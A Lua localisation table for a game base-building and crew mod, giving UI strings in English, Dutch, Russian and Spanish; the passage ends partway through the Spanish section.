languages = {}

-------------------------------- EN 

languages['en'] = {
    -- ProgressBars --
    ['prog_prop_upgrade'] = "Upgrading..",
    ['prog_prop_repair'] = "Repairing..",
    ['prog_plant_c4"'] = "Planting c4..",
    ['prog_health_regen_bed'] = "Regenerating health...",
    ['prog_health_regen_sofa'] = "Regenerating health...",
    ['prog_prop_remove'] = "Removing..",
    ['prog_add_fuel'] = "Adding fuel..",
    ['prog_prop_build'] = "Building...",

    -- No Target Texts (only edit this if you are not using a target system) -- 
    -- Information when interacting with a prop from a specific Type

    -- Texte ohne Ziel (nur bearbeiten, wenn du kein Zielsystem verwendest) --
    -- Informationen bei der Interaktion mit einem Gegenstand eines bestimmten Typs

    ["notarget_doors"] = 'Click ~INPUT_CONTEXT~ to interact with door \nPress ~INPUT_CONTEXT~ for 2 seconds to open door menu',
    ["notarget_windows"] = 'Click ~INPUT_CONTEXT~ to interact with window \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_walls"] = 'Press ~INPUT_CONTEXT~ for 2 seconds to open wall menu',
    ["notarget_bigwall"] = 'Press ~INPUT_CONTEXT~ for 2 seconds to open big wall menu',
    ["notarget_foundations"] = 'Press ~INPUT_CONTEXT~ for 2 seconds to open foundation menu',
    ["notarget_ceiling"] = 'Press ~INPUT_CONTEXT~ for 2 seconds to open ceiling menu',
    ["notarget_pillar"] = 'Press ~INPUT_CONTEXT~ for 2 seconds to open pillar menu',
    ["notarget_cook"] = 'Click ~INPUT_CONTEXT~ to interact with campfire \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_storages"] = 'Click ~INPUT_CONTEXT~ to open storage \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_beds"] = 'Click ~INPUT_CONTEXT~ to interact with bed \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_gate"] = 'Click ~INPUT_CONTEXT~ to interact with gate \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_generator"] = 'Click ~INPUT_CONTEXT~ to interact with generator \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_recycle"] = 'Click ~INPUT_CONTEXT~ to use recycle machine \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_crafting"] ='Click ~INPUT_CONTEXT~ to craft \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_light"] ='Click ~INPUT_CONTEXT~ to interact with lamp \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_biggate"] ='Click ~INPUT_CONTEXT~ to interact with big gate \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_biggateway"] ='Click ~INPUT_CONTEXT~ to interact with big gate \nPress ~INPUT_CONTEXT~ for 2 seconds to open gate frame menu',
    ["notarget_doorway"] ='Click ~INPUT_CONTEXT~ to interact with door \nPress ~INPUT_CONTEXT~ for 2 seconds to open door frame menu',
    ["notarget_deadStorage"] ='Click ~INPUT_CONTEXT~ to interact with bag \nPress ~INPUT_CONTEXT~ for 2 seconds to delete bag',
    -- Press info --
    ["notarget_pressingText"] ="Pressing ~INPUT_CONTEXT~ to open Menu ",

    -- Tutorial Text
    ["tutorial_text"] = 'Press ~INPUT_CELLPHONE_LEFT~ or ~INPUT_CELLPHONE_RIGHT~ ro rotate, ~INPUT_CELLPHONE_UP~ or ~INPUT_CELLPHONE_DOWN~ to move up or down, ~INPUT_WEAPON_WHEEL_NEXT~ or ~INPUT_WEAPON_WHEEL_PREV~ to change object distance ,  ~INPUT_FRONTEND_RRIGHT~ to cancel or ~INPUT_CELLPHONE_SELECT~ to accept',
   
    -- General Locales --
    ["object_in_that_coords"] = "There is already an object in that coords",
    ["need_door_frame"] = "You need a door Frame",
    ["no_permission"] = "You have no permission.",
    ["no_permission_build"] = "You have no permission to build here",
    ["no_item"] = "You don't have this item",
    ["base_repaired"] = "Base repaired",
    ["object_repaired"] = "Object Repaired",
    ["no_space"] = "Not enought inventory space",
    ["no_build_zone"] = "You can't build in this zone",
    ["need_window_frame"] = "You need a window frame",
    ["need_gate_frame"] = "You need a gate frame",
    ["foundation_up"] = "The foundation needs to be up",
    ["foundation_down"] = "The foundation needs to be down",
    ["need_pillars"] = "You need atleast 2 pillars or a wall to make a ceiling",
    ["light_close"] = "There is already a light close to this place",
    ["to_close_foundation"] = "You are too close to a foundation",
    ["no_under_ground"] = "You can't build under the ground",
    ["to_close"] = "Too close to another object",
    ["need_big_gateway"] = "You need a big gate frame",
    ["no_foundation"] = "There is no foundation or ceiling",
    ["no_fuel"] = "You have no fuel.",
    ["tank_full"] = "The tank is full",
    ["you_added"] = "You added ",
    ["l_fuel"] = "L of fuel",
    ["code_set"] = "Code Set to ",
    ["turn_off"] = "Turned OFF",
    ["turn_on"] = "Turned ON",
    ["no_fuel"] = "Not enought fuel",
    ["wrong_code"] = "Wrong Code",
    ["no_advanced"] = "No advanced interaction.",
    ["no_c4"] = "You need explosives",
    ["no_explode"] = "Can't explode this",
    ["need_items"] = "Needed Items:",
    ["repair_success"] = "Repair Success",
    ["no_gate"] = "There is no gate to interact",
    ["no_door"] = "There is no door to interact",
    ["no_electricity"] = "There is no electricity",
    ["no_player_id"] = "No player with this ID online",
    ["permission_added"] = "Permission added",
    ["permission_removed"] = "Permission removed",
    ["perm_clear"] = "Permissions Cleared",
    ["interact_with"] = "Interact with ",
    ["open"] = "Open ",
    ["settings"] = " settings",
    ["no_interactions"] = "You can't interact with this",
    ["delete"] = "Delete ",
    ["need_codelock"] = "You need a Code Lock item",
    ["use_c4"] = "Use c4 on this ",
    ["to_much_props"] = "To much props in this zone",
    ["incorrect_shape"] = "Incorrect shape",
    ["build_limit_1"] = "You reached your building limit",
    ["bed_limit"] = "You can Only have One Bed",
    ["no_stability"] = "This object needs more sustaining",

    -- CREW --

    ["crew_menu"] = "Crew Menu",
    ["crew_playerList"] = "List of Players",
    ["crew_manage"] = "Crew Management",
    ["crew_invitesList"] = "Invites List",
    ["crew_invite_header"] = "INVITE PLAYERS",
    ["crew_invite_desc"] = "click to invite players to crew",
    ["crew_manage_header"] = "MANAGE PLAYERS",
    ["crew_manage_desc"] = "click to manage crew",
    ["crew_delete_header"] = "DELETE CREW",
    ["crew_delete_desc"] = "click to delete crew",
    ["crew_leave_header"] = "LEAVE CREW",
    ["crew_leave_desc"] = "click to leave crew",
    ["crew_invites_header"] = "OPEN CREW INVITES",
    ["crew_invites_desc"] = "click to open invites",
    ["crew_create_header"] = "Create Crew",
    ["crew_create_desc"] = "click to create Crew",
    ["crew_join"] = "click join crew",
    ["crew_no_invites"] = "click join crew",
    ["crew_remove_player"] = "click remove this player from crew",
    ["crew_no_remove_you"] = "You can't remove yourself",
    ["crew_invite_player"] = "click to invite this player to crew",
    ["crew_no_players"] = "No players around you",
    ["crew_created"] = "You created a Crew",
    ["crew_deleted"] = "Your Crew got Deleted",
    ["crew_player_on_crew"] = "Player is already part of a Crew",
    ["crew_crew_limit"] = "You reached the crew limit",
    ["crew_new_invite"] = "You got a new crew invite",
    ["crew_you_invited"] = "You invited ",
    ["crew_to_crew"] = " to your Crew",
    ["crew_already_invited"] = "You already invited this player",
    ["crew_no_crew"] = "You have no crew",
    ["crew_limit_reached"] = "Crew reached the limit of members",
    ["crew_invite_accepted"] = "Invite Accepted",
    ["crew_new_to_crew"] = " is now part of your Crew",
    ["crew_joined"] = "You joined crew ",
    ["crew_you_left"] = "You left your Crew",
    ["crew_left_crew"] = ' left the Crew',
    ["crew_player_removed"] = "Player removed from Crew",
    ["crew_you_removed"] = "You got removed from your crew",

    -- code limit
    ["wrong_code_limit"] = "You reached the wrong code limit",

}

-------------------------------- Nederlands, Dutch, Netherlands 

languages['nl'] = {
    -- ProgressBars --
    ['prog_prop_upgrade'] = "Upgraden..",
    ['prog_prop_repair'] = "Repareren..",
    ['prog_plant_c4"'] = "c4 plaatsen..",
    ['prog_health_regen_bed'] = "Rust pakken...",
    ['prog_health_regen_sofa'] = "Rust pakken...",
    ['prog_prop_remove'] = "Verwijderen..",
    ['prog_add_fuel'] = "Benzine bijvullen..",
    ['prog_prop_build'] = "Bouwen...",

    -- Geen target text, niet vertaald. - No target, we didn't use this so we didn't translate it. (only edit this if you are not using a target system) -- 
    -- sInformation when interacting with a prop from a specific Type
    ["notarget_doors"] = 'Click ~INPUT_CONTEXT~ to interact with door \nPress ~INPUT_CONTEXT~ for 2 seconds to open door menu',
    ["notarget_windows"] = 'Click ~INPUT_CONTEXT~ to interact with window \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_walls"] = 'Press ~INPUT_CONTEXT~ for 2 seconds to open wall menu',
    ["notarget_bigwall"] = 'Press ~INPUT_CONTEXT~ for 2 seconds to open big wall menu',
    ["notarget_foundations"] = 'Press ~INPUT_CONTEXT~ for 2 seconds to open foundation menu',
    ["notarget_ceiling"] = 'Press ~INPUT_CONTEXT~ for 2 seconds to open ceiling menu',
    ["notarget_pillar"] = 'Press ~INPUT_CONTEXT~ for 2 seconds to open pillar menu',
    ["notarget_cook"] = 'Click ~INPUT_CONTEXT~ to interact with campfire \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_storages"] = 'Click ~INPUT_CONTEXT~ to open storage \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_beds"] = 'Click ~INPUT_CONTEXT~ to interact with bed \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_gate"] = 'Click ~INPUT_CONTEXT~ to interact with gate \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_generator"] = 'Click ~INPUT_CONTEXT~ to interact with generator \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_recycle"] = 'Click ~INPUT_CONTEXT~ to use recycle machine \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_crafting"] ='Click ~INPUT_CONTEXT~ to craft \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_light"] ='Click ~INPUT_CONTEXT~ to interact with lamp \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_biggate"] ='Click ~INPUT_CONTEXT~ to interact with big gate \nPress ~INPUT_CONTEXT~ for 2 seconds to open menu',
    ["notarget_biggateway"] ='Click ~INPUT_CONTEXT~ to interact with big gate \nPress ~INPUT_CONTEXT~ for 2 seconds to open gate frame menu',
    ["notarget_doorway"] ='Click ~INPUT_CONTEXT~ to interact with door \nPress ~INPUT_CONTEXT~ for 2 seconds to open door frame menu',
    ["notarget_deadStorage"] ='Click ~INPUT_CONTEXT~ to interact with bag \nPress ~INPUT_CONTEXT~ for 2 seconds to delete bag',
    -- Press info --
    ["notarget_pressingText"] ="Pressing ~INPUT_CONTEXT~ to open Menu ",

    -- Tutorial Text
    ["tutorial_text"] = 'Press ~INPUT_CELLPHONE_LEFT~ or ~INPUT_CELLPHONE_RIGHT~ ro rotate, ~INPUT_CELLPHONE_UP~ or ~INPUT_CELLPHONE_DOWN~ to move up or down, ~INPUT_WEAPON_WHEEL_NEXT~ or ~INPUT_WEAPON_WHEEL_PREV~ to change object distance ,  ~INPUT_FRONTEND_RRIGHT~ to cancel or ~INPUT_CELLPHONE_SELECT~ to accept',
   
    -- General Locales --
    ["object_in_that_coords"] = "Er bevindt zich al een object op die coördinaten",
    ["need_door_frame"] = "Je hebt een deurframe nodig",
    ["no_permission"] = "Je hebt geen toestemming",
    ["no_permission_build"] = "Je hebt geen toestemming om hier te bouwen",
    ["no_item"] = "Je hebt dit item niet",
    ["base_repaired"] = "Basis gerepareerd",
    ["object_repaired"] = "Object gerepareerd",
    ["no_space"] = "Niet genoeg inventarisruimte",
    ["no_build_zone"] = "Je kunt hier niet bouwen",
    ["need_window_frame"] = "Je hebt een raamframe nodig",
    ["need_gate_frame"] = "Je hebt een poortframe nodig",
    ["foundation_up"] = "Het fundament moet omhoog zijn",
    ["foundation_down"] = "Het fundament moet omlaag zijn",
    ["need_pillars"] = "Je hebt minstens 2 pilaren of een muur nodig om een plafond te maken",
    ["light_close"] = "Er is al een lamp dichtbij deze plek",
    ["to_close_foundation"] = "Je bent te dichtbij een fundament",
    ["no_under_ground"] = "Je kunt niet onder de grond bouwen",
    ["to_close"] = "Te dichtbij een ander object",
    ["need_big_gateway"] = "Je hebt een groot poortframe nodig",
    ["no_foundation"] = "Er is geen fundament of plafond",
    ["no_fuel"] = "Je hebt geen brandstof",
    ["tank_full"] = "De tank is vol",
    ["you_added"] = "Je hebt toegevoegd ",
    ["l_fuel"] = "L brandstof",
    ["code_set"] = "Code ingesteld op ",
    ["turn_off"] = "Uitgeschakeld",
    ["turn_on"] = "Ingeschakeld",
    ["no_fuel"] = "Niet genoeg brandstof",
    ["wrong_code"] = "Verkeerde code",
    ["no_advanced"] = "Geen geavanceerde interactie",
    ["no_c4"] = "Je hebt explosieven nodig",
    ["no_explode"] = "Kan dit niet laten exploderen",
    ["need_items"] = "Benodigde items:",
    ["repair_success"] = "Reparatie succesvol",
    ["no_gate"] = "Er is geen poort om mee te interacteren",
    ["no_door"] = "Er is geen deur om mee te interacteren",
    ["no_electricity"] = "Er is geen elektriciteit",
    ["no_player_id"] = "Er is geen speler online met dit ID",
    ["permission_added"] = "Toestemming toegevoegd",
    ["permission_removed"] = "Toestemming verwijderd",
    ["perm_clear"] = "Toestemmingen gewist",
    ["interact_with"] = "Interageer met ",
    ["open"] = "Open ",
    ["settings"] = " instellingen",
    ["no_interactions"] = "Je kunt hier niet mee interageren",
    ["delete"] = "Verwijder ",
    ["need_codelock"] = "Je hebt een Code Lock-item nodig",
    ["use_c4"] = "Gebruik c4 op de ",
    ["to_much_props"] = "Te veel props in deze zone",
    ["incorrect_shape"] = "Onjuiste vorm",
    ["build_limit_1"] = "Je hebt het limit bereikt van het bouwen.",
    ["bed_limit"] = "Je kan maar 1 bed hebben.",
    ["no_stability"] = "This object needs more sustaining",

    -- CREW --

    ["crew_menu"] = "Crew Menu",
    ["crew_playerList"] = "Spelers lijst",
    ["crew_manage"] = "beheer crew",
    ["crew_invitesList"] = "Invites",
    ["crew_invite_header"] = "INVITE SPELER",
    ["crew_invite_desc"] = "Klik om de speler te inviten voor je crew",
    ["crew_manage_header"] = "BEHEER SPELEERS",
    ["crew_manage_desc"] = "klik om je crew te beheren",
    ["crew_delete_header"] = "VERWIJDER CREW",
    ["crew_delete_desc"] = "klik om je crew te verwijderen",
    ["crew_leave_header"] = "VERLAAT CREW",
    ["crew_leave_desc"] = "Klik om de crew te verlaten",
    ["crew_invites_header"] = "OPEN CREW INVITES",
    ["crew_invites_desc"] = "klik om je crew invites te openen",
    ["crew_create_header"] = "MAAK CREW",
    ["crew_create_desc"] = "Klik om een nieuwe crew aan te maken",
    ["crew_join"] = "Klik om crew te joinen",
    ["crew_no_invites"] = "klik om de crew te joinen",
    ["crew_remove_player"] = "klik om de speler te verwijderen.",
    ["crew_no_remove_you"] = "Je kan jezelf niet verwijderen",
    ["crew_invite_player"] = "Klik om deze speler te inviten voor je crew",
    ["crew_no_players"] = "Er zijn geen spelers in de buurt",
    ["crew_created"] = "Je hebt een nieuwe crew aangemaakt",
    ["crew_deleted"] = "Je crew is verwijderd",
    ["crew_player_on_crew"] = "De speler zit al in je crew",
    ["crew_crew_limit"] = "Je hebt al het maximale spelers in je crew",
    ["crew_new_invite"] = "Je hebt een nieuwe crew invite gekregen",
    ["crew_you_invited"] = "Je hebt ",
    ["crew_to_crew"] = " uitgenodigd voor je crew",
    ["crew_already_invited"] = "Je hebt deze speler al geïnvite voor je crew",
    ["crew_no_crew"] = "Je hebt geen crew",
    ["crew_limit_reached"] = "Crew heeft het maximale spelers bereikt.",
    ["crew_invite_accepted"] = "Invite geaccepteerd",
    ["crew_new_to_crew"] = " Is nu onderdeel van je crew",
    ["crew_joined"] = "Je joined ",
    ["crew_you_left"] = "Je hebt je crew verlaten",
    ["crew_left_crew"] = ' verlaat de crew',
    ["crew_player_removed"] = "Speler is verwijderd uit de crew",
    ["crew_you_removed"] = "Je bent verwijderd uit de crew",

    -- code limit
    ["wrong_code_limit"] = "je hebt te vaak onjuist wachtwoord ingevuld",

}


-------------------------------- RUSSIAN -----

languages['ru'] = {
    -- ProgressBars --
    ['prog_prop_upgrade'] = "Улучшение..",
    ['prog_prop_repair'] = "Починка..",
    ['prog_plant_c4"'] = "Установка взрывчатки..",
    ['prog_health_regen_bed'] = "Отдыхаю...",
    ['prog_health_regen_sofa'] = "Отдыхаю...",
    ['prog_prop_remove'] = "Разбираю..",
    ['prog_add_fuel'] = "Заправка топлива..",
    ['prog_prop_build'] = "Постройка...",

    -- No Target Texts (only edit this if you are not using a target system) -- 
    -- Information when interacting with a prop from a specific Type
    ["notarget_doors"] = 'Нажмите ~INPUT_CONTEXT~ для взаимодействия с дверью \nPress ~INPUT_CONTEXT~ на 2 секунды открыть меню двери',
    ["notarget_windows"] = 'Нажмите ~INPUT_CONTEXT~ для взаимодействия с окном \nPress ~INPUT_CONTEXT~ на 2 секунды для открытия меню',
    ["notarget_walls"] = 'Зажмите ~INPUT_CONTEXT~ на 2 секунды для открытия меню забора',
    ["notarget_bigwall"] = 'Зажмите ~INPUT_CONTEXT~ на 2 секунды для открытия меню большого забора',
    ["notarget_foundations"] = 'Зажмите ~INPUT_CONTEXT~ на 2 секунды для открытия меню фундамента',
    ["notarget_ceiling"] = 'Нажмите ~INPUT_CONTEXT~ на 2 секунды для открытия меню потолка',
    ["notarget_pillar"] = 'Нажмите ~INPUT_CONTEXT~ на 2 секунды для открытия меню столба',
    ["notarget_cook"] = 'Нажмите ~INPUT_CONTEXT~ для взаимодействия с костром \nPress ~INPUT_CONTEXT~ на 2 секунды для открытия меню',
    ["notarget_storages"] = 'Нажмите ~INPUT_CONTEXT~ для открытия хранилища \nPress ~INPUT_CONTEXT~ на 2 секунды для открытия меню',
    ["notarget_beds"] = 'Нажмите ~INPUT_CONTEXT~ для взаимодействия с кроватью \nPress ~INPUT_CONTEXT~ на 2 секунды для открытия меню',
    ["notarget_gate"] = 'Нажмите ~INPUT_CONTEXT~ для взаимодействия с воротами \nPress ~INPUT_CONTEXT~ на 2 секунды для открытия меню',
    ["notarget_generator"] = 'Нажмите ~INPUT_CONTEXT~ для взаимодействия с генератором \nPress ~INPUT_CONTEXT~ на 2 секунды для открытия меню',
    ["notarget_recycle"] = 'Нажмите ~INPUT_CONTEXT~ использовать переработчик \nPress ~INPUT_CONTEXT~ на 2 секунды для открытия меню',
    ["notarget_crafting"] ='Нажмите ~INPUT_CONTEXT~ для крафта \nPress ~INPUT_CONTEXT~ на 2 секунды для открытия меню',
    ["notarget_light"] ='Нажмите ~INPUT_CONTEXT~ для взаимодействия с лампой \nPress ~INPUT_CONTEXT~ на 2 секунды для открытия меню',
    ["notarget_biggate"] ='Нажмите ~INPUT_CONTEXT~ для взаимодействия с большим забором \nPress ~INPUT_CONTEXT~ на 2 секунды для открытия меню',
    ["notarget_biggateway"] ='Нажмите ~INPUT_CONTEXT~ для взаимодействия с большими воротами \nPress ~INPUT_CONTEXT~ на 2 секунды для открытия меню рамы ворот',
    ["notarget_doorway"] ='Нажмите ~INPUT_CONTEXT~ для взаимодействия с двеью \nPress ~INPUT_CONTEXT~ на 2 секунды для открытия меню рамы двери',
    ["notarget_deadStorage"] ='Нажмите ~INPUT_CONTEXT~ для взаимодействия с мешком \nPress ~INPUT_CONTEXT~ на 2 секунды для удаления',
    -- Press info --
    ["notarget_pressingText"] ="Зажмите ~INPUT_CONTEXT~ для открытия меню ",

    -- Tutorial Text
    ["tutorial_text"] = 'Нажмите ~INPUT_CELLPHONE_LEFT~ или ~INPUT_CELLPHONE_RIGHT~ для поворота, ~INPUT_CELLPHONE_UP~ или ~INPUT_CELLPHONE_DOWN~ поднять или опустить,  ~INPUT_FRONTEND_RRIGHT~ закрыть или ~INPUT_CELLPHONE_SELECT~ подтвердить',
   
    -- General Locales --
    ["object_in_that_coords"] = "В этих координатах уже есть объект",
    ["need_door_frame"] = "Вам нужна дверная рама",
    ["no_permission"] = "У вас нет разрешения.",
    ["no_permission_build"] = "У вас нет разрешения на строительство здесь",
    ["no_item"] = "У вас нет этого предмета",
    ["base_repaired"] = "База отремонтирована",
    ["object_repaired"] = "Объект отремонтирован",
    ["no_space"] = "Недостаточно места в инвентаре",
    ["no_build_zone"] = "Вы не можете строить в этой зоне",
    ["need_window_frame"] = "Вам нужна оконная рама",
    ["need_gate_frame"] = "Вам нужна рама для ворот",
    ["foundation_up"] = "Фундамент должен быть поднят",
    ["foundation_down"] = "Фундамент должен быть опущен",
    ["need_pillars"] = "Вам нужно как минимум 3 столба",
    ["light_close"] = "Рядом с этим местом уже есть свет",
    ["to_close_foundation"] = "Вы слишком близко к фундаменту",
    ["no_under_ground"] = "Вы не можете строить под землей",
    ["to_close"] = "Слишком близко к другому объекту",
    ["need_big_gateway"] = "Вам нужна большая рама ворот",
    ["no_foundation"] = "Нет ни фундамента, ни потолка",
    ["no_fuel"] = "У вас нет топлива.",
    ["tank_full"] = "Бак полный",
    ["you_added"] = "Вы добавили ",
    ["l_fuel"] = "Л топлива",
    ["code_set"] = "Пароль установлен на ",
    ["turn_off"] = "Выключено",
    ["turn_on"] = "Включено",
    ["no_fuel"] = "Недостаточно топлива",
    ["wrong_code"] = "Неверный пароль",
    ["no_advanced"] = "Нет расширенного взаимодействия.",
    ["no_c4"] = "Вам нужна взрывчатка",
    ["no_explode"] = "Не могу взорвать это",
    ["need_items"] = "Необходимые предметы:",
    ["repair_success"] = "Ремонт завершён",
    ["no_gate"] = "Нет ворот для взаимодействия",
    ["no_door"] = "Нет двери для взаимодействия",
    ["no_electricity"] = "Нет электричества",
    ["no_player_id"] = "Нет игроков с этим id онлайн",
    ["permission_added"] = "Разрешение добавлено",
    ["permission_removed"] = "Разрешение удалено",
    ["perm_clear"] = "Разрешения очищены",
    ["interact_with"] = "Взаимодействие с ",
    ["open"] = "Настроить ",
    ["settings"] = " ",
    ["no_interactions"] = "Вы не можете взаимодействовать с этим",
    ["delete"] = "Удалить ",
    ["need_codelock"] = "Вам нужен кодовый замок",
    ["use_c4"] = "Взорвать ",
    ["to_much_props"] = "Слишком много пропов в этой зоне",
    ["incorrect_shape"] = "Неправильная форма",
    ["build_limit_1"] = "Вы достигли лимита построек",
    ["bed_limit"] = "У вас может быть только одна кровать",
    ["no_stability"] = "This object needs more sustaining",

    -- CREW --

    ["crew_menu"] = "Меню группировки",
    ["crew_playerList"] = "Список участников",
    ["crew_manage"] = "Управление группировкой",
    ["crew_invitesList"] = "Список приглашений",
    ["crew_invite_header"] = "ПРИГЛАСИТЬ ЧЕЛОВЕКА",
    ["crew_invite_desc"] = "нажмите, чтобы пригласить людей",
    ["crew_manage_header"] = "СПИСОК УЧАСТНИКОВ",
    ["crew_manage_desc"] = "нажмите, чтобы настроить участников",
    ["crew_delete_header"] = "УДАЛИТЬ ГРУППИРОВКУ",
    ["crew_delete_desc"] = "нажмите, чтобы удалить группировку",
    ["crew_leave_header"] = "ПОКИНУТЬ ГРУППИРОВКУ",
    ["crew_leave_desc"] = "нажмите, чтобы покинуть группировку",
    ["crew_invites_header"] = "ОТКРЫТЬ ПРИГЛАШЕНИЯ В ГРУППИРОВКУ",
    ["crew_invites_desc"] = "нажмите, чтобы посмотреть список приглашений",
    ["crew_create_header"] = "Создать группировку",
    ["crew_create_desc"] = "нажмите, чтобы создать группировку",
    ["crew_join"] = "нажмите, чтобы вступить в группировку",
    ["crew_no_invites"] = "нажмите, чтобы вступить в группировку",
    ["crew_remove_player"] = "нажмите, чтобы выгнать человека",
    ["crew_no_remove_you"] = "Вы не можете выгнать себя",
    ["crew_invite_player"] = "нажмите, чтобы пригласить человека к себе",
    ["crew_no_players"] = "Нет людей рядом",
    ["crew_created"] = "Вы создали группировку",
    ["crew_deleted"] = "Ваша группировка удалена",
    ["crew_player_on_crew"] = "Человек уже в группировке",
    ["crew_crew_limit"] = "Вы достигли лимита людей в группировке",
    ["crew_new_invite"] = "Вы получили новое приглашение в группировку",
    ["crew_you_invited"] = "Вы пригласили ",
    ["crew_to_crew"] = " в вашу группировку",
    ["crew_already_invited"] = "Вы уже пригласили этого человека",
    ["crew_no_crew"] = "У вас нет группировки",
    ["crew_limit_reached"] = "Группировка достигла предела участников",
    ["crew_invite_accepted"] = "Приглашение принято",
    ["crew_new_to_crew"] = " теперь является частью вашей группировки",
    ["crew_joined"] = "Вы присоединились к группировке ",
    ["crew_you_left"] = "Вы покинули свою группировку",
    ["crew_left_crew"] = ' покинул/а группировку',
    ["crew_player_removed"] = "Человек удален из группировки",
    ["crew_you_removed"] = "Вы были изгнанны из группировки",

    -- code limit
    ["wrong_code_limit"] = "Вы достигли максимального числа попыток",

}





-------------------------------- SPANISH -----

languages['es'] = {
    -- ProgressBars --
    ['prog_prop_upgrade'] = "Actualización..",
    ['prog_prop_repair'] = "Reparación..",
    ['prog_plant_c4"'] = "Plantando c4..",
    ['prog_health_regen_bed'] = "Regenerando la salud...",
    ['prog_health_regen_sofa'] = "Regenerando la salud...",
    ['prog_prop_remove'] = "Eliminando..",
    ['prog_add_fuel'] = "Añadiendo combustible..",
    ['prog_prop_build'] = "Construyendo...",
 
    -- Press info --
    ["notarget_pressingText"] ="Presiona ~INPUT_CONTEXT~ para abrir Menú",

    -- Tutorial Text
    ["tutorial_text"] = 'Presiona ~INPUT_CELLPHONE_LEFT~ o ~INPUT_CELLPHONE_RIGHT~ rotar, ~INPUT_CELLPHONE_UP~ o ~INPUT_CELLPHONE_DOWN~ moverse hacia arriba o hacia abajo,  ~INPUT_FRONTEND_RRIGHT~ para cancelar o ~INPUT_CELLPHONE_SELECT~ aceptar',

    -- General Locales --
    ["object_in_that_coords"] = "Ya hay un objeto en esas coordenadas",
    ["need_door_frame"] = "Necesitas un marco de puerta",
    ["no_permission"] = "No tienes permisos.",
    ["no_permission_build"] = "No tienes permisos para construir aqui",
    ["no_item"] = "No tienes este item",
    ["base_repaired"] = "Base reparada",
    ["object_repaired"] = "Objecto reparado",
    ["no_space"] = "No tienes espacio en el inventario",
    ["no_build_zone"] = "No se puede construir en esta zona",
    ["need_window_frame"] = "Necesitas un maro de ventana",
    ["need_gate_frame"] = "Necesitas un marco de puerta",
    ["foundation_up"] = "La base debe estar levantada",
    ["foundation_down"] = "La base debe estar abajo",
    ["need_pillars"] = "Necesitas al menos 2 pilares o una pared para hacer un techo",
    ["light_close"] = "Ya hay una luz cerca de este lugar.",
    ["to_close_foundation"] = "Estás demasiado cerca de una fundación",
    ["no_under_ground"] = "No se puede construir bajo tierra",
    ["to_close"] = "Demasiado cerca de otro objeto",
    ["need_big_gateway"] = "Necesitas un marco de puerta grande",
    ["no_foundation"] = "No hay cimientos ni techo.",
    ["no_fuel"] = "No tienes combustible.",
    ["tank_full"] = "El tanque esta lleno",
    ["you_added"] = "Tu agregaste ",
    ["l_fuel"] = "L para recargar",
    ["code_set"] = "Código establecido en ",
    ["turn_off"] = "Apagado",
    ["turn_on"] = "Encendido",
    ["no_fuel"] = "No hay suficiente combustible",
    ["wrong_code"] = "Codigo erroneo",
    ["no_advanced"] = "Sin interacción avanzada.",
    ["no_c4"] = "Necesitas explosivos",
    ["no_explode"] = "No puedo explotar esto",
    ["need_items"] = "Items necesarios:",
    ["repair_success"] = "Reparación exitosa",
    ["no_gate"] = "No hay puerta para interactuar.",
    ["no_door"] = "No hay puerta para interactuar.",
    ["no_electricity"] = "No hay electricidad",
    ["no_player_id"] = "No hay jugadores con esa id ahora mismo",
    ["permission_added"] = "Permiso agregado",
    ["permission_removed"] = "Permiso eliminado",
    ["perm_clear"] = "Permisos Borrados",
    ["interact_with"] = "Interactuar con ",
    ["open"] = "Abrir configuracion de ",
    ["settings"] = " configuracion",
    ["no_interactions"] = "No puedes interactuar con esto",
    ["delete"] = "Borrar ",
    ["need_codelock"] = "Necesita un item de bloqueo de código",
    ["use_c4"] = "Usar c4 en esta ",
    ["to_much_props"] = "Demasiados accesorios en esta zona",
    ["incorrect_shape"] = "Forma incorrecta",
    ["build_limit_1"] = "Alcanzaste tu límite de construcción",
    ["bed_limit"] = "Solo puedes tener una cama",

    -- CREW --

    ["crew_menu"] = "Menu Tribu",
    ["crew_playerList"] = "Lista de jugadores",
    ["crew_manage"] = "Gestion Tribu",
    ["crew_invitesList"] = "Lista de invitados",
    ["crew_invite_header"] = "JUGADORES INVITADOS",
    ["crew_invite_desc"] = "haz clic para invitar jugadores a la tribu",
    ["crew_manage_header"] = "GESTIONAR JUGADORES",
    ["crew_manage_desc"] = "haga clic para administrar la tribu",
    ["crew_delete_header"] = "ELIMINAR TRIBU",
    ["crew_delete_desc"] = "haga clic para eliminar la tribu",
    ["crew_leave_header"] = "DEJAR TRIBU",
    ["crew_leave_desc"] = "haga clic para salir de la tribu",
    ["crew_invites_header"] = "INVITACIONES DE TRIBU ABIERTO",
    ["crew_invites_desc"] = "clic para abrir invitaciones",
    ["crew_create_header"] = "Crear tribu",
    ["crew_create_desc"] = "haz clic para crear tribu",
    ["crew_join"] = "haga clic en unirse a la tribu",
    ["crew_no_invites"] = "haga clic en unirse a la tribu",
    ["crew_remove_player"] = "haz clic en eliminar a este jugador de la tribu",
    ["crew_no_remove_you"] = "No puedes quitarte a ti mismo",
    ["crew_invite_player"] = "haz clic para invitar a este jugador a la tribu",
    ["crew_no_players"] = "No hay jugadores a tu alrededor",
    ["crew_created"] = "Has creado una tribu",
    ["crew_deleted"] = "Tu tribu fue eliminada",
    ["crew_player_on_crew"] = "El jugador ya es parte de una tribu",
    ["crew_crew_limit"] = "Has alcanzado el límite de miembros",
